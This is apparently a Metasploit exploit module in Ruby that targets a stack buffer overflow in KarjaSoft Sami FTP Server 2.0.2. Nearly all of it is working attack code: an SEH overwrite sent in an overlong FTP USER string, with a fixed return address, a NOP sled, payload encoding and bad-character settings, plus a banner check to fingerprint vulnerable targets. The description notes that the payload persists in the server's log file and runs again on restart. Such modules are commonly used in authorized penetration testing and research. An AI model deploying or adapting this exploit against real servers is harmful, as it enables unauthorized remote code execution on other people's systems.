KarjaSoft Sami FTP Server v2.0.2 USER Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'	=> 'KarjaSoft Sami FTP Server v2.0.2 USER Overflow',
        'Description'	=> %q{
          This module exploits an unauthenticated stack buffer overflow in
          KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long
          USER string during login.

          The payload is triggered when the administrator opens the application
          GUI. If the GUI window is open at the time of exploitation, the
          payload will be executed immediately. Keep this in mind when selecting
          payloads. The application will crash following execution of the
          payload and will not restart automatically.

          When the application is restarted, it will re-execute the payload
          unless the payload has been manually removed from the SamiFTP.binlog
          log file.

          This module has been tested successfully on Sami FTP Server versions:
          2.0.2 on Windows XP SP0 (x86);
          2.0.2 on Windows 7 SP1 (x86);
          2.0.2 on Windows 7 SP1 (x64); and
          2.0.2 on Windows 10 (1909) (x64).
        },
        'Author'	=> [
          'Muhammad Ahmed Siddiqui', # Discovery
          'Critical Security', # Perl exploit
          'n30m1nd', # Python exploit - SEH overwrite with 2.0.2 universal tmp01.dll p/p/r
          'aushack', # Metasploit
          'bcoles' # Metasploit
        ],
        'Arch'	=> [ ARCH_X86 ],
        'License'	=> MSF_LICENSE,
        'References'	=>
          [
            # This vulnerability appears to have been reported multiple times.
            ['CVE', '2006-0441'],
            ['CVE', '2006-2212'],
            ['OSVDB', '25670'],
            ['BID', '16370'],
            ['BID', '22045'],
            ['BID', '17835'],
            ['EDB', '1448'],
            ['EDB', '1452'],
            ['EDB', '1462'],
            ['EDB', '3127'],
            ['EDB', '3140'],
            ['EDB', '40675']
          ],
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'seh'
          },
        'Platform' => ['win'],
        'Privileged' => false,
        'Payload'	=>
          {
            'Space'	=> 800,
            'BadChars' => "\x00\x0a\x0d\x20\xff",
            'EncoderType' => Msf::Encoder::Type::AlphanumMixed
          },
        'Targets' =>
          [
            ['Sami FTP Server version 2.0.2', { 'Ret' => 0x10022ADE }], # p/p/r tmp01.dll
          ],
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN ]
        },
        'DisclosureDate' => '2006-01-24'
      )
    )

    register_options([
      Opt::RPORT(21)
    ])
  end

  def check
    connect
    banner = sock.get_once(-1, 3)
    disconnect

    unless banner.include?('Sami FTP Server')
      return CheckCode::Safe('Target is not Sami FTP Server')
    end

    if banner.include?('Sami FTP Server 2.0.2')
      return CheckCode::Appears('Sami FTP Server version 2.0.2.')
    end

    CheckCode::Detected
  end

  def exploit
    connect

    nseh = "\xeb\x06"
    nseh << rand_text_alpha(2)
    seh = [target.ret].pack('V')

    user = rand_text_alpha(596)
    user << nseh
    user << seh
    user << "\x90" * 10
    user << payload.encoded
    user << "\x90" * (800 - payload.encoded.length)

    print_status("Sending payload (#{user.length} bytes) ...")
    sock.put("USER #{user}\r\n")
    sock.recv(4096)

    sock.put("PASS #{Rex::Text.rand_char(payload_badchars)}\r\n")
    sock.recv(4096)

    handler
    disconnect
  end
end